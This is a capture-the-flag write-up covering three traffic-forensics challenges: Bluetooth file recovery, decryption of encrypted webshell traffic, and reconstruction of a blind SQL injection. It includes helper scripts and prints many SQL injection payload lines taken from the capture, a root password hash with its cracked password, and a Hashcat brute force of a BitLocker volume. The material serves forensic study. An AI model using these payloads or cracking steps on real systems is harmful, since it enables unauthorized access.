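1. BlueTrace
A small-time hacker connected his own tool phone to the Bluetooth of a confidential computer and sent a secret file to the computer over that Bluetooth link. Can you find the secret of this secret file?
Following the hint about a file transfer, sort the packets by size in descending order; this reveals OBEX traffic.
A JPG file was transferred. Export the data with a script, then convert it to a JPG.
After converting it to a JPG image, a ZIP file turns out to be appended at the end; extract it.
A hint for the extraction password is found: the archive password is the name of the target computer of the Bluetooth transfer.
This gives the extraction password infernityのpc, but extraction fails. Guessing that the problem is letter case, generate a password dictionary with all case variations.
The correct extraction password is INFERNITYのPC; extraction yields flag.png.
Every pixel has identical R, G and B values. Converting hex to a string reveals a hint: extract the R channel of all pixels row by row and convert it to hex.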
DASCTF{0ba687ee-60e0-4697-8f4c-42e9b81d2dc6}
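The "ZIP appended to the JPG" step above can be checked structurally instead of by eye. The following is an added example, not code from the original writeup: it walks the JPEG segments to find the real end-of-image marker (an embedded thumbnail has its own FFD9, so searching for the first one is wrong) and then inspects whatever follows. The sample bytes are constructed and only marker-valid, not a renderable image.

```python
import io
import zipfile

def jpeg_end(data: bytes) -> int:
    """Offset just past the real EOI marker, found by walking JPEG segments."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("missing SOI marker, not a JPEG")
    pos, in_scan = 2, False
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            if not in_scan:
                raise ValueError(f"expected a marker at offset {pos}")
            pos += 1                     # ordinary entropy-coded byte
            continue
        marker = data[pos + 1]
        if marker == 0xD9:               # EOI: the image ends here
            return pos + 2
        if marker == 0xFF:               # fill byte before a marker
            pos += 1
        elif in_scan and (marker == 0x00 or 0xD0 <= marker <= 0xD7):
            pos += 2                     # stuffed FF00 or restart marker
        else:                            # length-prefixed segment (APPn, DQT, SOS, ...)
            seg_len = int.from_bytes(data[pos + 2:pos + 4], "big")
            pos += 2 + seg_len           # skips embedded thumbnails and their EOI
            in_scan = marker == 0xDA     # scan data follows an SOS header
    raise ValueError("EOI marker not found")

def trailing_zip(data: bytes):
    """Return (zip_offset, [(name, is_encrypted)]) for a ZIP after the JPEG, else None."""
    end = jpeg_end(data)
    idx = data.find(b"PK\x03\x04", end)  # ZIP local file header signature
    if idx < 0:
        return None
    with zipfile.ZipFile(io.BytesIO(data[idx:])) as zf:
        return idx, [(i.filename, bool(i.flag_bits & 0x1)) for i in zf.infolist()]

def build_sample():
    """Constructed input: marker-valid (not renderable) JPEG with a ZIP appended."""
    thumb = b"\xff\xd8\xff\xd9"          # stand-in for an EXIF thumbnail
    app1 = b"\xff\xe1" + (2 + len(thumb)).to_bytes(2, "big") + thumb
    scan = b"\xff\xda\x00\x02" + b"\x12\xff\x00\x34\xff\xd0\x56"
    jpeg = b"\xff\xd8" + app1 + scan + b"\xff\xd9"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("flag.png", b"constructed payload")
    return jpeg, jpeg + buf.getvalue()

if __name__ == "__main__":
    jpeg, blob = build_sample()
    print(trailing_zip(blob), "naive first FFD9 ends at", blob.find(b"\xff\xd9") + 2)
```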
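2. Webshell Plus
This traffic looks a bit familiar, yet a bit strange... (Attacking the public IPs that appear in the challenge is forbidden and has nothing to do with solving it.) The flag is the MD5 of the root user's password; for example, if the root user's password is 123456, the flag is DASCTF{e10adc3949ba59abbe56e057f20f883e}
Following the challenge description, a look through the capture shows a large number of shell.php entries at the end.
Double-click to jump straight to packet 52493, then page backwards.
The key for AES encryption and decryption is transmitted encrypted with RSA.
The RSA public key is transmitted (Base64-encoded first, then decoded):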
LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZU1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTUFEQ0JpQUtCZ0ZnbU95bVQ5RUp2QzhzSFRXeG92MExRV1NvbQpMNURQUmlUVUVuUW5yRG1LWUd2TlNOTUozVjFmUjFocjlqUTZvZXB2UXZqTXlXc3lUTDZKM245bmJPR2Q1dGV5Ci80QkxUWEhReWFYY1NwZmwzejYxZkJKenk5MXJaclhiek1ZMWFkSEg0Vll5VW9EUTdxa0YyL1JWblI4UEpWelIKb0puK1hhSDNSYWJrekhpdEFnTUJBQUU9Ci0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
-----BEGIN PUBLIC KEY-----
MIGeMA0GCSqGSIb3DQEBAQUAA4GMADCBiAKBgFgmOymT9EJvC8sHTWxov0LQWSom
L5DPRiTUEnQnrDmKYGvNSNMJ3V1fR1hr9jQ6oepvQvjMyWsyTL6J3n9nbOGd5tey
/4BLTXHQyaXcSpfl3z61fBJzy91rZrXbzMY1adHH4VYyUoDQ7qkF2/RVnR8PJVzR
oJn+XaH3RabkzHitAgMBAAE=
-----END PUBLIC KEY-----
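Obtain the p value: 519a73ca97a9e3ea. The first 16 characters of its MD5, d14d8ce94563e71a, are the key for the subsequent AES decryption. The challenge asks for root's password, which is usually found in the response data.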
root:$6$usxF0HGWeE25vIFv$keFDGNYIyFJVioH.RNFyVrtK7wK3o.q5U6vTgZGFWN9NZxFGOxesnd523tCBxIF4CHY8ak3u5nid8LPwVtBGT1:20239:0:::::
root password: slideshow
DASCTF{f3d279e1b58a1e25c092b018f035d406}
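3. 一把嗦 (One-Shot)
I get the feeling that the author of this challenge is quietly mocking CTFers who only know how to one-shot everything with traffic tools!
The challenge attachment is 222.pcapng, which consists entirely of HTTP traffic; export it directly.
This exports a pile of files. Reviewing a summary of the requests shows that injection requests related to the flag appear at the end.
The SQL injection flow is roughly: register, log in, view the user status. If the response shows 尊贵的VIP用户 ("distinguished VIP user"), the injected character is correct.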
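import os

folder = "./out/"          # directory holding the exported HTTP objects
lst = os.listdir(folder)   # the script relies on this order matching capture order
out = ""
tmp = ""
flag = []
for i in lst:
    i = folder + i
    with open(i, "r", encoding="utf-8") as f:
        all_str = f.read().strip()
    # Request file: remember the most recent injection probe against the flag table
    if "(SELECT+content+FROM+flag)," in all_str and "login=1" in all_str:
        tmp_lst = all_str.split("\n")
        for j in tmp_lst:
            if "(SELECT+content+FROM+flag)," in j and "login=1" in j:
                tmp = j.strip()
    # Response file: the VIP message means the remembered probe guessed correctly.
    # tmp is not reset afterwards, so every later VIP response re-appends the
    # last probe, which is how the final probe can appear several times.
    if "您是尊贵的VIP用户" in all_str and len(tmp) > 0:
        out = out + tmp + "\n"
        # The ASCII code sits between "1))=" and "+--+"
        flag.append(tmp.split("1))=")[1].split("+--+")[0])
print(out)
print(flag)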
This yields the ASCII codes of the flag:
username='+or+unicode(substr((SELECT+content+FROM+flag),1,1))=82+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),2,1))=69+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),3,1))=70+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),4,1))=84+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),5,1))=81+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),6,1))=49+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),7,1))=82+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),8,1))=71+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),9,1))=101+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),10,1))=122+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),11,1))=107+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),12,1))=48+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),13,1))=79+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),14,1))=71+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),15,1))=85+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),16,1))=48+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),17,1))=89+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),18,1))=122+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),19,1))=103+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),20,1))=53+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),21,1))=76+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),22,1))=84+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),23,1))=78+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),24,1))=108+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),25,1))=77+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),26,1))=109+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),27,1))=81+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),28,1))=116+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),29,1))=78+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),30,1))=68+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),31,1))=108+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),32,1))=108+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),33,1))=79+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),34,1))=83+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),35,1))=48+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),36,1))=52+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),37,1))=57+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),37,1))=57+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),37,1))=57+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),37,1))=57+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),37,1))=57+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),37,1))=57+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),37,1))=57+--+&password=123456&login=1
username='+or+unicode(substr((SELECT+content+FROM+flag),37,1))=57+--+&password=123456&login=1
['82', '69', '70', '84', '81', '49', '82', '71', '101', '122', '107', '48', '79', '71', '85', '48', '89', '122', '103', '53', '76', '84', '78', '108', '77', '109', '81', '116', '78', '68', '108', '108', '79', '83', '48', '52', '57', '57', '57', '57', '57', '57', '57', '57']
This gives the first half of the flag:
REFTQ1RGezk0OGU0Yzg5LTNlMmQtNDllOS04
DASCTF{948e4c89-3e2d-49e9-8
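When reconstructing what a boolean-blind injection leaked, pairing each probe with its own response and keeping one value per position avoids the repeated trailing entries seen in the list above. The following is an added example, not the writeup's script: `recover`, `b64_prefix` and `probe` are names introduced here, and the sample pairs are constructed from the first eight probes shown on the page plus made-up false responses.

```python
import base64
import re
from urllib.parse import unquote_plus

# Probe shape used in this capture: unicode(substr((<query>),<pos>,1))=<code>
PROBE = re.compile(r"unicode\(substr\(\((?P<query>.+?)\),(?P<pos>\d+),1\)\)=(?P<code>\d+)")
TRUE_MARKER = "您是尊贵的VIP用户"   # response text the page treats as "condition true"

def recover(pairs, true_marker=TRUE_MARKER):
    """pairs: (request_body, response_body) tuples, each request with its own response.
    Returns {query: (recovered_text, missing_positions)}."""
    hits = {}
    for request, response in pairs:
        m = PROBE.search(unquote_plus(request))
        if m and true_marker in response:
            # keep one value per position, so a replayed probe cannot add duplicates
            hits.setdefault(m["query"], {}).setdefault(int(m["pos"]), chr(int(m["code"])))
    result = {}
    for query, chars in hits.items():
        missing = [p for p in range(1, max(chars) + 1) if p not in chars]
        result[query] = ("".join(chars[p] for p in sorted(chars)), missing)
    return result

def b64_prefix(text):
    """Decode the longest prefix that is a whole number of Base64 quanta."""
    return base64.b64decode(text[: len(text) // 4 * 4])

def probe(pos, code):   # rebuilds the request body format shown on the page
    return (f"username='+or+unicode(substr((SELECT+content+FROM+flag),{pos},1))"
            f"={code}+--+&password=123456&login=1")

# Constructed sample: the first eight confirmed probes from the page, one replayed
# response and two failed guesses ("login failed" is a made-up false response).
CODES = [82, 69, 70, 84, 81, 49, 82, 71]
SAMPLE = [(probe(1, 81), "login failed")]
SAMPLE += [(probe(i + 1, c), TRUE_MARKER) for i, c in enumerate(CODES)]
SAMPLE += [(probe(8, 71), TRUE_MARKER), (probe(9, 100), "login failed")]

if __name__ == "__main__":
    for query, (text, missing) in recover(SAMPLE).items():
        print(query, text, missing, b64_prefix(text))
```

The `missing` list flags positions for which no confirmed probe was captured, which indicates an incomplete capture rather than a shorter secret.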
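Export the 35MB index.php, which contains Base64-encoded data; decoding it gives a 7z file, and extracting that gives secret.vmdk. Loading it in RStudio shows that it is BitLocker-encrypted.
Brute-force it with Hashcat.
This gives the decryption key: esternocleidomastoideo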
aaencode — Rot8000
DASCTF{948e4c89-3e2d-49e9-881a-4ba1ae5dde7e}